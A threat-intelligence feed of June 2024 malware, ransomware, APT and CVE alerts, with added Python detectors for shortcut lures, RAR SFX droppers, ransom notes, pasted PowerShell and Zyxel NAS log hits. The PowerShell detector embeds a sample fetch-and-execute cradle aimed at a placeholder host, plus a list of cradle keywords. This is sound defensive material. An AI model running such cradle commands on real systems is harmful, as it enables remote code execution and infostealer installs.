
DATE | NAME | CATEGORY | SUBCATEGORY | INFO

8.6.24 | Sticky Werewolf APT | ALERTS | APT | Sticky Werewolf is a threat group first documented over a year ago. It has targeted a range of organizations, most recently in the pharmaceutical and aviation sectors. In its attacks the group uses malicious .lnk files disguised as .docx documents, decoy .pdf files, and malicious Batch and AutoIT scripts, among other components.
8.6.24 | Seidr Stealer | ALERTS | Virus | Seidr is another recently discovered infostealer sold through illicit marketplaces. The malware is written in C++ with a modular architecture. It steals a range of data from compromised endpoints, including OS details, browser data, keylogged input and cryptocurrency wallets.
8.6.24 | DORRA Ransomware | ALERTS | RANSOM | DORRA is a recently found ransomware variant from the Makop family. It encrypts user files and appends the ".DORRA" extension, together with a unique victim ID and the developer's email address, to their names. A ransom note named "README-WARNING.txt" asks victims to contact the attackers at the provided email address for decryption instructions.
8.6.24 | Apache RocketMQ targeted in Muhstik botnet campaign | ALERTS | BOTNET | A campaign exploiting a known Apache RocketMQ remote code execution vulnerability (CVE-2023-33246) to deploy the Muhstik botnet has been observed. Muhstik, best known for distributed denial-of-service (DDoS) attacks, establishes persistence, evades detection, moves laterally and communicates with an IRC command-and-control server. Infected hosts are used for cryptocurrency mining and for launching DDoS attacks.
8.6.24 | Enhanced version of Vidar Stealer emerges | ALERTS | Virus | An updated version of Vidar Stealer has been observed in the wild. The customizable malware is sold on dark web forums and Telegram channels as malware-as-a-service, uses social media platforms as part of its command-and-control infrastructure, and is distributed alongside other families such as STOP/Djvu ransomware and the SmokeLoader backdoor.
8.6.24 | CashRansomware - a new arrival to the threat landscape | ALERTS | RANSOM | CashRansomware (aka CashCrypt) is a newly identified Ransomware-as-a-Service (RaaS) variant. According to researchers from Tehtris, the malware still appears to be under active development. CashRansomware is written in C# and uses time-stomping techniques to detect execution inside a sandbox or virtualized environment.
8.6.24 | UNC1151 APT targets the Ukrainian Ministry of Defence with malicious Excel campaign | ALERTS | APT | The UNC1151 APT group, known for targeting Eastern European countries, has been observed running a malware campaign against the Ukrainian Ministry of Defence that uses a malicious Excel document as the lure.
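Sticky Werewolf's lure, as described above, is a shortcut whose name looks like a document. The following added example (written for this page, not code from the researchers who reported the campaign) parses the MS-SHLLINK header and StringData of a .lnk file with only the standard library and flags the two tells: a document extension in front of .lnk, and a target that launches an interpreter. The sample shortcut, its relative path and its command line are constructed for the demo and are not taken from a real Sticky Werewolf sample; the interpreter list is an assumption about what such a lure usually runs.

```python
"""Parse a Windows shortcut (.lnk) and flag the document-lookalike launcher lure.
Added example, not BI.ZONE's or any vendor's code.  The sample shortcut below is
constructed from the MS-SHLLINK layout, not taken from a real campaign."""
import struct

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")   # {00021401-0000-0000-C000-000000000046}
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = (("name", HAS_NAME), ("relative_path", HAS_REL_PATH),
                 ("working_dir", HAS_WORKING_DIR), ("arguments", HAS_ARGS),
                 ("icon_location", HAS_ICON))
DOC_EXT = (".docx", ".doc", ".pdf", ".xlsx", ".xls", ".txt")
# Assumed list of interpreters a document-disguised shortcut typically launches.
INTERPRETERS = ("cmd.exe", "powershell", "pwsh", "wscript", "cscript", "mshta", "rundll32", "msiexec")


def parse_lnk(data: bytes) -> dict:
    """Return LinkFlags plus the five StringData fields (None when absent)."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink (.lnk) header")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = 76                                            # fixed ShellLinkHeader size
    if flags & HAS_ID_LIST:                             # IDListSize + IDList
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                           # LinkInfoSize counts itself
        pos += struct.unpack_from("<I", data, pos)[0]
    fields = {"flags": flags}
    for key, bit in STRING_FIELDS:                      # StringData comes in this fixed order
        if not flags & bit:
            fields[key] = None
            continue
        count = struct.unpack_from("<H", data, pos)[0]  # CountCharacters, no terminator
        pos += 2
        if flags & IS_UNICODE:
            fields[key] = data[pos:pos + 2 * count].decode("utf-16-le")
            pos += 2 * count
        else:
            fields[key] = data[pos:pos + count].decode("cp1252")
            pos += count
    return fields


def lure_indicators(filename: str, data: bytes) -> list:
    """Indicators that a shortcut is a document-disguised launcher."""
    fields = parse_lnk(data)
    low = filename.lower()
    hits = []
    if low.endswith(".lnk") and low[:-4].endswith(DOC_EXT):
        hits.append("double extension: " + filename)
    target = " ".join(v for v in (fields["relative_path"], fields["arguments"]) if v).lower()
    if any(i in target for i in INTERPRETERS):
        hits.append("target runs an interpreter: " + target[:100])
    return hits


def build_lnk(relative_path: str, arguments: str) -> bytes:
    """Constructed minimal Unicode shortcut with no IDList/LinkInfo (demo only)."""
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    # 4 (size) + 16 (CLSID) + 4 (flags) + 52 bytes of attributes/times/sizes/reserved = 76
    header = struct.pack("<I", 0x4C) + LNK_CLSID + struct.pack("<I", flags) + b"\x00" * 52

    def s(text):
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + s(relative_path) + s(arguments)


# Constructed lure modelled on the ".lnk disguised as .docx" pattern; the command line is made up.
LURE_NAME = "invoice.docx.lnk"
LURE = build_lnk("..\\..\\..\\Windows\\System32\\cmd.exe",
                 "/c start /min wscript.exe stage1.vbs")

if __name__ == "__main__":
    print(parse_lnk(LURE))
    print(lure_indicators(LURE_NAME, LURE))
```

The parser stops at StringData because that is where the lure's command line lives; the optional ExtraData blocks that follow are not needed for this check.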
7.6.24 | appRain CMF 4.0.5 - Remote Code Execution (RCE) (Authenticated) | Exploit | WebApps | PHP
7.6.24 | CMSimple 5.15 - Remote Code Execution (RCE) (Authenticated) | Exploit | WebApps | PHP
7.6.24 | WBCE CMS v1.6.2 - Remote Code Execution (RCE) | Exploit | WebApps | PHP
7.6.24 | Monstra CMS 3.0.4 - Remote Code Execution (RCE) | Exploit | WebApps | PHP
7.6.24 | Dotclear 2.29 - Remote Code Execution (RCE) | Exploit | WebApps | PHP
7.6.24 | Serendipity 2.5.0 - Remote Code Execution (RCE) | Exploit | WebApps | PHP
7.6.24 | Sitefinity 15.0 - Cross-Site Scripting (XSS) | Exploit | WebApps | Multiple

7.6.24 | Ransomware Trends 2024 | REPORT | REPORT | Veeam’s goal is to relentlessly advance data and cyber resilience to keep your business running.
7.6.24 | SickSync | CAMPAIGN | CAMPAIGN | Renewed Info Stealer Campaign Targets Ukrainian Military
7.6.24 | SPECTR | MALWARE | Stealer | SPECTR Malware Targets Ukraine Defense Forces in SickSync Campaign
7.6.24 | GhostWriter | GROUP | GROUP | Ghostwriter is referred to as an 'activity set', with various incidents tied together by overlapping behavioral characteristics and personas, rather than as an actor or group in itself.
7.6.24 | Commando Cat | GROUP | Cryptojacking | Commando Cat: A Novel Cryptojacking Attack Abusing Docker Remote API Servers
7.6.24 | Muhstik | MALWARE | Trojan | Muhstik Malware Targets Message Queuing Services Applications

6.6.24 | BoxedApp | MALWARE | App | BoxedApp products are general packers built on top of its SDK, which provides the ability to create Virtual Storage (Virtual File System, Virtual Registry), Virtual Processes, and a universal instrumentation system (WIN/NT API hooking).
6.6.24 | 'Lumma' crypto stealer | MALWARE | Stealer | Russia-linked 'Lumma' crypto stealer now targets Python devs

6.6.24 | CVE-2024-32113 - Path Traversal vulnerability in Apache OFBiz | ALERTS | VULNERABILITY | CVE-2024-32113 is a recently disclosed path traversal vulnerability in Apache OFBiz, an open source enterprise resource planning (ERP) system. Successful exploitation can lead to remote code execution in the context of the affected service account. The vulnerability is fixed in Apache OFBiz 18.12.13 and later.
6.6.24 | Rising trend of exploiting Packer apps in targeted attacks | ALERTS | Virus | Abuse of commercial packer apps to deploy malware payloads is increasingly common. Numerous known malware families, primarily RATs and stealers, have been packed with commercial packers in attacks on financial institutions and government organizations. BoxedApp is one such utility; its virtual storage, virtual processes and virtual registry make packed malware harder for endpoint protection products to detect or analyze.
6.6.24 | The rise of Kiteshield packer in the ever-evolving landscape of Linux malware | ALERTS | Virus | Threat actors constantly seek new tactics and platforms to evade detection and carry out espionage. An increasing focus on Linux has produced a surge of Linux malware, and threat actors are now using the Kiteshield packer to evade detection on that platform.
6.6.24 | CoinMiner's Proxy Server Suffers Unlucky Ransomware Attack | ALERTS | RANSOM | Reports describe what appears to be accidental cross-over between criminal operations: a CoinMiner operator's proxy server was exposed to the Internet and was hit by a ransomware actor's RDP scanning attack. If this becomes more common it will complicate threat analysis, as it blurs the lines between attack groups and their intentions.

6.6.24 | SenSayQ: Emerging Ransomware Group | ALERTS | RANSOM | SenSayQ is an emerging ransomware actor recently observed in the threat landscape. Its modus operandi is still largely unknown, but the group uses double-extortion tactics, exfiltrating data from victims' environments before encrypting their files. Encryption is performed with a LockBit variant, and ransom notes named [randomID].README.txt are dropped in most folders; their content starts with "---Welcome! Your are locked by SenSayQ!---". As with other ransomware actors, victims are pressured to make contact within 72 hours or have their stolen data published on the attackers' website.
6.6.24 | New Linux variant of the TargetCompany ransomware | ALERTS | RANSOM | A new Linux variant of the TargetCompany (aka Mallox) ransomware family has been found in the wild. As described in a recent Trend Micro report, the group using this variant is actively attacking ESXi environments. The attackers use a custom shell script to deliver the payload and exfiltrate victim information. The malware encrypts user data and appends the .locked extension to encrypted files; once encryption completes, a ransom note named "HOW TO DECRYPT.txt" is dropped on the victim's machine.
6.6.24 | Updated Cuckoo malware variant spotted in the wild | ALERTS | Virus | Cuckoo is an infostealing macOS malware first discovered earlier this year, and a new variant has recently been observed in the wild, distributed via a fake Homebrew package manager website. The malware has the usual infostealer feature set: it steals confidential information, credentials, browser cookies and cryptocurrency wallets, and exfiltrates the collected data to attacker-controlled C2 servers. The new variant also adds virtual machine detection.
6.6.24 | RansomHub Ransomware | ALERTS | RANSOM | In a newly released report, Symantec's Threat Hunter Team analyzes the highly active RansomHub ransomware and its similarity to the now-defunct Knight ransomware. The analysis indicates that RansomHub's developers are not Knight's, but the significant code overlap suggests they purchased the Knight source code, which was offered for sale in early 2024. As with other operations, RansomHub attacks involve vulnerability exploitation and dual-use tools to aid distribution.

6.6.24 | DarkCrystal RAT Delivered via Signal Messenger | ALERTS | Virus | The Signal messaging application, widely used by military personnel, is being abused to deliver DarkCrystal RAT to government officials, military personnel and representatives of defense enterprises in Ukraine. The infection chain begins with a message containing an archive, its password and instructions to open it. Inside the archive is an executable (".pif" or ".exe") that is actually a RAR SFX archive containing a VBE file, a BAT file and an EXE file; running them infects the computer with DarkCrystal RAT, giving the attackers remote access.
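The DarkCrystal RAT lure above is an executable that is really a RAR self-extracting archive. The following added example, written for this page rather than taken from the advisory, shows how to recognise the embedded archive and list its RAR4 members without extracting or executing anything, then flags the combination of a .pif/.exe wrapper and script members. The sample SFX (an MZ stub followed by a hand-built stored RAR4 archive) and its member names are constructed; the RAR5 format is detected but not walked here.

```python
"""Recognise a RAR SFX executable and list its RAR4 members without running it.
Added example, not CERT-UA's or any vendor's code.  The sample SFX is
constructed inline: a PE-looking stub followed by a hand-built RAR4 archive."""
import struct

RAR4_MARK = b"Rar!\x1a\x07\x00"        # RAR4 marker block (also a 7-byte block header)
RAR5_MARK = b"Rar!\x1a\x07\x01\x00"
SCRIPT_EXT = (".vbe", ".vbs", ".bat", ".cmd", ".js", ".ps1")


def find_sfx_archive(data: bytes):
    """Return (format, offset) of a RAR archive embedded after a PE stub, else None."""
    if data[:2] != b"MZ":
        return None
    for fmt, mark in (("RAR5", RAR5_MARK), ("RAR4", RAR4_MARK)):
        off = data.find(mark)
        if off != -1:
            return fmt, off
    return None


def list_rar4_names(data: bytes, start: int) -> list:
    """Walk RAR4 block headers from the marker block at `start` and collect the
    names of FILE_HEAD (0x74) blocks.  Header CRCs are not verified: this is
    triage, not extraction."""
    names = []
    pos = start + len(RAR4_MARK)
    while pos + 7 <= len(data):
        _crc, htype, flags, hsize = struct.unpack_from("<HBHH", data, pos)
        if hsize < 7:
            break                                    # corrupt header, stop walking
        if htype == 0x74:
            (pack_size, _unp, _host, _fcrc, _ftime, _ver, _method,
             name_size, _attr) = struct.unpack_from("<IIBIIBBHI", data, pos + 7)
            name_off = pos + 7 + 25 + (8 if flags & 0x100 else 0)   # LHD_LARGE adds two high-size fields
            raw = data[name_off:name_off + name_size]
            if flags & 0x200:                        # LHD_UNICODE: ASCII name, NUL, encoded unicode
                raw = raw.split(b"\x00", 1)[0]
            names.append(raw.decode("cp437", "replace"))
            pos += hsize + pack_size                 # packed data follows the header
        elif htype == 0x7B:                          # ENDARC
            break
        else:                                        # MAIN_HEAD, comments, etc.
            add = struct.unpack_from("<I", data, pos + 7)[0] if flags & 0x8000 else 0
            pos += hsize + add
    return names


def sfx_verdict(filename: str, data: bytes) -> dict:
    """Flag an executable wrapper that bundles script files inside an archive."""
    hit = find_sfx_archive(data)
    if hit is None:
        return {"sfx": None, "members": [], "suspicious": False}
    fmt, off = hit
    members = list_rar4_names(data, off) if fmt == "RAR4" else []   # RAR5 walking not implemented here
    suspicious = (filename.lower().endswith((".pif", ".exe", ".scr", ".com"))
                  and any(m.lower().endswith(SCRIPT_EXT) for m in members))
    return {"sfx": fmt, "members": members, "suspicious": suspicious}


def build_sample_sfx() -> bytes:
    """Constructed sample: MZ stub followed by a RAR4 archive with three stored members."""
    def block(htype, flags, body):
        return struct.pack("<HBHH", 0, htype, flags, 7 + len(body)) + body   # CRC left as 0

    def file_block(name, payload):
        nb = name.encode("cp437")
        body = struct.pack("<IIBIIBBHI", len(payload), len(payload), 0, 0, 0,
                           29, 0x30, len(nb), 0x20) + nb            # method 0x30 = stored
        return block(0x74, 0x8000, body) + payload

    stub = b"MZ" + b"\x00" * 126
    archive = (RAR4_MARK + block(0x73, 0, b"\x00" * 6)              # MAIN_HEAD
               + file_block("1.vbe", b"#@~^")
               + file_block("run.bat", b"@echo off")
               + file_block("svc.exe", b"MZ")
               + block(0x7B, 0x4000, b""))                           # ENDARC
    return stub + archive


if __name__ == "__main__":
    print(sfx_verdict("photo.pif", build_sample_sfx()))
```

Because the SFX stub is a normal PE, signature-based scanners that only look at the header see a small installer; searching for the RAR marker and reading the member names gives a verdict before anything is executed.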

6.6.24 | Cobalt Strike campaign targets Ukraine using malicious Excel files | ALERTS | CAMPAIGN | Fortinet researchers have observed a new campaign delivering Cobalt Strike payloads to targets in Ukraine. The attackers use a multi-stage approach: Excel files containing malicious VBA macros, followed by DLL downloaders and injectors in later stages. The Cobalt Strike payload lets the attackers communicate with command-and-control (C2) servers and execute arbitrary commands.
6.6.24 | Android Spyware Targets Brazilian Mobile Users in Nubank Masquerade | ALERTS | Virus | Nubank, a leading Latin American digital bank known for its no-fee credit card and mobile banking services, is the latest financial brand abused in social engineering schemes aimed at mobile users in Brazil. An actor has created malicious Android applications (Nubank.apk) that appear to be related to Nubank, most likely distributed via malicious SMS or social platforms. A user who is lured into installing the fake Nubank app ends up with the well-known SpyNote remote access trojan.
6.6.24 | CVE-2024-24919 - Check Point Security Gateway Information Disclosure Vulnerability | ALERTS | VULNERABILITY | CVE-2024-24919 is an information disclosure vulnerability in Check Point Security Gateway, an integrated software solution that connects corporate networks, branch offices and business partners over a secure channel. Successful exploitation may allow an attacker to read certain information on Internet-connected gateways configured with the IPSec VPN, remote access VPN or Mobile Access software blade. Symantec's network protection technology, Intrusion Prevention System (IPS), blocks these exploitation attempts.
6.6.24 | CVE-2024-27348 - Remote Code Execution vulnerability in Apache HugeGraph Server | ALERTS | VULNERABILITY | A critical remote code execution (RCE) vulnerability, CVE-2024-27348 (CVSS 9.8), has been disclosed in Apache HugeGraph-Server, an open source graph database built for scalable, high-performance storage and analysis of large graphs and commonly deployed on Java 8 and Java 11. The vulnerability affects versions from 1.0.0 up to, but not including, 1.3.0 on Java 8 and Java 11 and allows an attacker to execute arbitrary commands on the server. Successful exploitation can give the attacker full control of the server, the ability to manipulate data, and potentially compromise of the entire system. Symantec's network protection technology, Intrusion Prevention System (IPS), blocks these exploitation attempts.
6.6.24 | Underground Ransomware Remains Active | ALERTS | RANSOM | Over the past year the ransomware actor known as "Underground" has been less active than other groups, yet it remains in the threat landscape and continues to target organizations of various sizes. The group is known for a lengthy ransom note (!!READ_ME!!.txt) that details the data it has exfiltrated. Victims are given an ID and a password with which to contact the group through a website on the TOR network.
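The DORRA, SenSayQ, TargetCompany/Mallox (Linux) and Underground entries above each name a file-rename pattern or a ransom-note file. The following added example, not vendor code, turns those indicators into a single directory sweep: it counts renamed files per family and collects the notes, and for the SenSayQ name shape, which is generic enough to collide with legitimate files, it also checks the note's opening line (quoted verbatim from the entry, spelling included). The demo tree, the e-mail address, and the order of the ID and e-mail in the DORRA file name are constructed for the example.

```python
"""Sweep a directory tree for the rename patterns and ransom-note files named in
the DORRA, SenSayQ, TargetCompany/Mallox (Linux) and Underground entries.
Added example, not vendor code.  The name patterns are exactly what those
entries state; the demo tree and everything in it is constructed."""
import os
import re
import tempfile
from pathlib import Path

# family -> (regex on encrypted-file name, regex on note name, required note prefix)
FAMILIES = {
    "DORRA (Makop)": (re.compile(r"\.DORRA$"), re.compile(r"^README-WARNING\.txt$"), None),
    "SenSayQ": (None, re.compile(r"^[A-Za-z0-9]+\.README\.txt$"),
                "---Welcome! Your are locked by SenSayQ!---"),     # verbatim from the entry
    "TargetCompany/Mallox (Linux)": (re.compile(r"\.locked$"), re.compile(r"^HOW TO DECRYPT\.txt$"), None),
    "Underground": (None, re.compile(r"^!!READ_ME!!\.txt$"), None),
}


def _note_starts_with(path: str, prefix: str) -> bool:
    """Content check for note names that are too generic on their own."""
    want = prefix.encode()
    with open(path, "rb") as fh:
        return fh.read(len(want)) == want


def sweep(root: str) -> dict:
    """Return {family: {"encrypted": count, "notes": [paths]}} for families seen under root."""
    report = {fam: {"encrypted": 0, "notes": []} for fam in FAMILIES}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            for fam, (enc_re, note_re, prefix) in FAMILIES.items():
                if enc_re and enc_re.search(name):
                    report[fam]["encrypted"] += 1
                elif note_re.match(name) and (prefix is None or _note_starts_with(path, prefix)):
                    report[fam]["notes"].append(path)
    return {fam: r for fam, r in report.items() if r["encrypted"] or r["notes"]}


def build_sample_tree() -> str:
    """Constructed victim-like tree under a temp dir; returns its root."""
    root = tempfile.mkdtemp(prefix="ransom-sweep-demo-")

    def put(rel, body=b""):
        p = Path(root, rel)
        p.parent.mkdir(parents=True, exist_ok=True)
        p.write_bytes(body)

    put("docs/budget.xlsx.[1A2B3C4D].[contact@example.invalid].DORRA")   # ID/email order is assumed
    put("docs/README-WARNING.txt", b"Your files are encrypted, write to us ...")
    put("vmfs/guest01.vmdk.locked")
    put("vmfs/HOW TO DECRYPT.txt", b"Your data is encrypted ...")
    put("home/user/x9Kp2q.README.txt", b"---Welcome! Your are locked by SenSayQ!---\r\n...")
    put("home/user/notes.README.txt", b"just my meeting notes")        # same name shape, benign content
    put("home/user/!!READ_ME!!.txt", b"Underground ...")
    put("home/user/report.docx", b"clean")
    return root


if __name__ == "__main__":
    for fam, r in sweep(build_sample_tree()).items():
        print(f"{fam}: {r['encrypted']} renamed file(s), {len(r['notes'])} note(s)")
```

Run it against a mounted image or a file-server share rather than the live host: the sweep only reads names and the first bytes of candidate notes, so it is safe on evidence, and the per-family counts tell a responder which playbook to open.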

6.6.24 | Botnet malware campaign distributing NiceRAT malware | ALERTS | Virus | A botnet campaign has been reported distributing NiceRAT disguised as Windows or Office authentication (activation) tools or free game servers, via domestic file-sharing sites and blogs. NiceRAT is a Python-based open source program with anti-debugging and anti-virtual-machine capabilities. It collects system information, browser data and cryptocurrency data from compromised systems and exfiltrates it to a threat actor-controlled Discord channel, which serves as the command-and-control (C&C) server.
6.6.24 | LummaC2 Infostealer Delivered via a Recent ClearFake Campaign | ALERTS | Virus | ClearFake is a JavaScript framework that combines drive-by downloads with social engineering, typically in fake "browser update" campaigns. Researchers recently uncovered a new ClearFake tactic in which users are tricked into manually pasting and running malicious PowerShell code themselves, instead of being lured into downloading a malicious payload as before. The change is designed to evade security controls, and the chain ultimately installs the LummaC2 infostealer.
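Because the ClearFake chain described above ends with the victim pasting a command into PowerShell, the telemetry to hunt is process creation rather than a download. The following added example, not code from the researchers, scores process-creation events for that pattern: PowerShell started from explorer.exe, a hidden window, an encoded command (decoded here from its UTF-16LE base64 form) and download-and-execute cradle tokens. The key="value" event lines, the user names and the URL are constructed for the demo and only loosely follow a flattened Sysmon EID 1 / Windows 4688 record; the token list and the score threshold are assumptions.

```python
"""Score process-creation events for the 'paste this into PowerShell' pattern.
Added example, not vendor code.  Event lines, users and the URL are constructed;
the record layout is a loose key="value" flattening of Sysmon EID 1 / 4688."""
import base64
import re

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')
ENC_RE = re.compile(r"(?:-encodedcommand|-enc|-ec|-e)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Assumed cradle/evasion tokens; extend from your own detections.
CRADLE_TOKENS = ("iex", "invoke-expression", "iwr ", "invoke-webrequest", "downloadstring",
                 "net.webclient", "frombase64string", "-nop", "-w hidden",
                 "-windowstyle hidden", "bypass")
MIN_SCORE = 3          # assumed threshold: one weak signal alone is not a finding


def parse_event(line: str) -> dict:
    """Turn a key="value" / key=value line into a dict."""
    return {k: (q or u) for k, q, u in KV_RE.findall(line)}


def decode_encoded_command(cmdline: str):
    """Return the UTF-16LE plaintext of an -EncodedCommand argument, or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(line: str):
    """Return a finding dict for a ClearFake-like PowerShell launch, else None."""
    ev = parse_event(line)
    if basename(ev.get("Image", "")) not in ("powershell.exe", "pwsh.exe"):
        return None
    cmd = ev.get("CommandLine", "")
    decoded = decode_encoded_command(cmd)
    # Score the visible command line with the base64 blob removed, plus its decoded
    # form, so that a random base64 run cannot accidentally match a token.
    text = (ENC_RE.sub(" ", cmd) + " " + (decoded or "")).lower()
    reasons = []
    if basename(ev.get("ParentImage", "")) == "explorer.exe":
        reasons.append("launched interactively from explorer.exe (Run dialog / pasted command)")
    if decoded is not None:
        reasons.append("encoded command decodes to: " + decoded[:80])
    reasons += ["contains " + tok.strip() for tok in CRADLE_TOKENS if tok in text]
    if len(reasons) < MIN_SCORE:
        return None
    return {"user": ev.get("User"), "score": len(reasons), "reasons": reasons, "decoded": decoded}


# Constructed sample: the URL and user names are placeholders, not real indicators.
PAYLOAD = "$u='http://update.example.invalid/fix.ps1'; iex (iwr $u -UseBasicParsing)"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    'EventID=1 User=CORP\\alice ParentImage=C:\\Windows\\explorer.exe '
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell.exe -w hidden -nop -enc ' + ENCODED + '"',
    'EventID=1 User=CORP\\bob ParentImage="C:\\Program Files\\Git\\git-bash.exe" '
    'Image=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe '
    'CommandLine="powershell.exe -File C:\\build\\package.ps1"',
    'EventID=1 User=CORP\\carol ParentImage=C:\\Windows\\explorer.exe '
    'Image=C:\\Windows\\System32\\cmd.exe CommandLine="cmd.exe /c dir"',
]

if __name__ == "__main__":
    for line in SAMPLE_EVENTS:
        print(triage(line))
```

The decoded payload is what analysts actually need in the ticket; keep it alongside the raw line, because the base64 form is what the user pasted and is the string to search for in RunMRU and clipboard-manager artefacts.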

6.6.24 | Brazilian banking trojan CarnavalHeist | ALERTS | Virus | A recent campaign targets Brazilian users with a banking Trojan dubbed CarnavalHeist. The infection chain begins with a finance-themed email that lures the recipient into downloading an invoice ("Nota Fiscal", Portuguese for invoice). The download is actually a malicious LNK file that triggers further downloads and execution of script components, which deliver the final payload. Details of the campaign and the suspected attacker were published in a new Cisco Talos report.
6.6.24 | RedTail cryptomining malware exploiting PAN-OS vulnerability | ALERTS | CRYPTOCURRENCY | The RedTail cryptocurrency mining malware has added a PAN-OS vulnerability to its exploit arsenal. CVE-2024-3400 is a now-patched PAN-OS vulnerability that allows an attacker to execute arbitrary code with root privileges; successful exploitation leads to the download of the RedTail payload. The malware employs advanced evasion and persistence techniques and has also propagated through other vulnerabilities, such as CVE-2023-46805 and CVE-2024-21887.

5.6.24 | Operation Crimson Palace | OPERATION | OPERATION | Operation Crimson Palace: Sophos threat hunting unveils multiple clusters of Chinese state-sponsored activity targeting Southeast Asian government
5.6.24 | Excel File Deploys | HACKING | HACKING | FortiGuard Labs has recently identified a sophisticated cyberattack involving an Excel file embedded with a VBA macro designed to deploy a DLL file.
5.6.24 | RansomHub | RANSOMWARE | RANSOMWARE | RansomHub: New Ransomware has Origins in Older Knight

5.6.24 | CVE-2024-29972 | Vulnerability | CVE | This command injection vulnerability in the CGI program “remote_help-cgi” in Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute some operating system (OS) commands by sending a crafted HTTP POST request.
5.6.24 | CVE-2024-29973 | Vulnerability | CVE | This command injection vulnerability in the “setCookie” parameter in Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute some OS commands by sending a crafted HTTP POST request.
5.6.24 | CVE-2024-29974 | Vulnerability | CVE | This remote code execution vulnerability in the CGI program “file_upload-cgi” in Zyxel NAS326 and NAS542 devices could allow an unauthenticated attacker to execute arbitrary code by uploading a crafted configuration file to a vulnerable device.
5.6.24 | CVE-2024-29975 | Vulnerability | CVE | This improper privilege management vulnerability in the SUID executable binary in Zyxel NAS326 and NAS542 devices could allow an authenticated local attacker with administrator privileges to execute some system commands as the “root” user on a vulnerable device.
5.6.24 | CVE-2024-29976 | Vulnerability | CVE | This improper privilege management vulnerability in the command “show_allsessions” in Zyxel NAS326 and NAS542 devices could allow an authenticated attacker to obtain a logged-in administrator’s session information containing cookies on an affected device.
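The five Zyxel entries above name the CGI programs, the parameter and the command involved, which is enough to triage a NAS web access log. The following added example, not Zyxel's code, maps those names to the CVE identifiers and aggregates hits per source address, treating a 2xx answer on an exploit path as a probable success. The "/cgi-bin/" prefix, the sample log lines and the addresses are constructed for the demo; a parameter sent in a POST body (such as setCookie) is only visible if the logging layer records bodies, and CVE-2024-29975 is local and leaves no web-log trace.

```python
"""Triage a combined-format access log for the Zyxel NAS CGI programs and
commands named in CVE-2024-29972/-29973/-29974/-29976.  Added example, not
Zyxel's code.  The /cgi-bin/ prefix and the sample lines are constructed."""
import re
from collections import defaultdict
from urllib.parse import urlsplit, unquote

# Apache/nginx "combined" format: ip ident user [time] "METHOD target proto" status size ...
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# (CVE, predicate over method, decoded path, decoded query).  Names come from the
# CVE descriptions; where in the URL they appear is an assumption for the demo.
INDICATORS = (
    ("CVE-2024-29972", lambda m, p, q: m == "POST" and p.endswith("remote_help-cgi")),
    ("CVE-2024-29973", lambda m, p, q: m == "POST" and "setCookie" in q),   # body params not visible
    ("CVE-2024-29974", lambda m, p, q: m == "POST" and p.endswith("file_upload-cgi")),
    ("CVE-2024-29976", lambda m, p, q: "show_allsessions" in p or "show_allsessions" in q),
)
# CVE-2024-29975 (SUID binary abuse) is local and leaves no web-log trace.


def classify(line: str):
    """Return (ip, cve, status) when a line matches an indicator, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path, query = unquote(parts.path), unquote(parts.query)
    for cve, pred in INDICATORS:
        if pred(m["method"], path, query):
            return m["ip"], cve, int(m["status"])
    return None


def triage(lines) -> dict:
    """Aggregate hits per source IP: {ip: {"cves": set, "successes": n}}.
    A 2xx on an exploit path is counted as a probable success worth escalating."""
    report = defaultdict(lambda: {"cves": set(), "successes": 0})
    for line in lines:
        hit = classify(line)
        if hit:
            ip, cve, status = hit
            report[ip]["cves"].add(cve)
            if 200 <= status < 300:
                report[ip]["successes"] += 1
    return dict(report)


SAMPLE_LOG = [  # constructed lines; addresses are documentation ranges, not real sources
    '10.0.0.5 - - [05/Jun/2024:10:01:02 +0000] "GET / HTTP/1.1" 200 5120',
    '203.0.113.7 - - [05/Jun/2024:10:03:11 +0000] "POST /cgi-bin/remote_help-cgi HTTP/1.1" 200 88',
    '203.0.113.7 - - [05/Jun/2024:10:03:12 +0000] "POST /cgi-bin/file_upload-cgi HTTP/1.1" 500 0',
    '198.51.100.9 - - [05/Jun/2024:10:04:40 +0000] "GET /cgi-bin/show_allsessions HTTP/1.1" 200 31',
    '10.0.0.5 - - [05/Jun/2024:10:05:00 +0000] "POST /login HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for ip, r in triage(SAMPLE_LOG).items():
        print(ip, sorted(r["cves"]), "probable successes:", r["successes"])
```

A status code alone does not prove exploitation, so the output is a prioritised list for the NAS owner to check against firmware version and the device's own logs, not a verdict.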

5.6.24 | Decoy Dog 2 | OPERATION | RAT | Hellhounds: operation Lahat
5.6.24 | Decoy Dog 1 | OPERATION | RAT | Hellhounds: operation Lahat
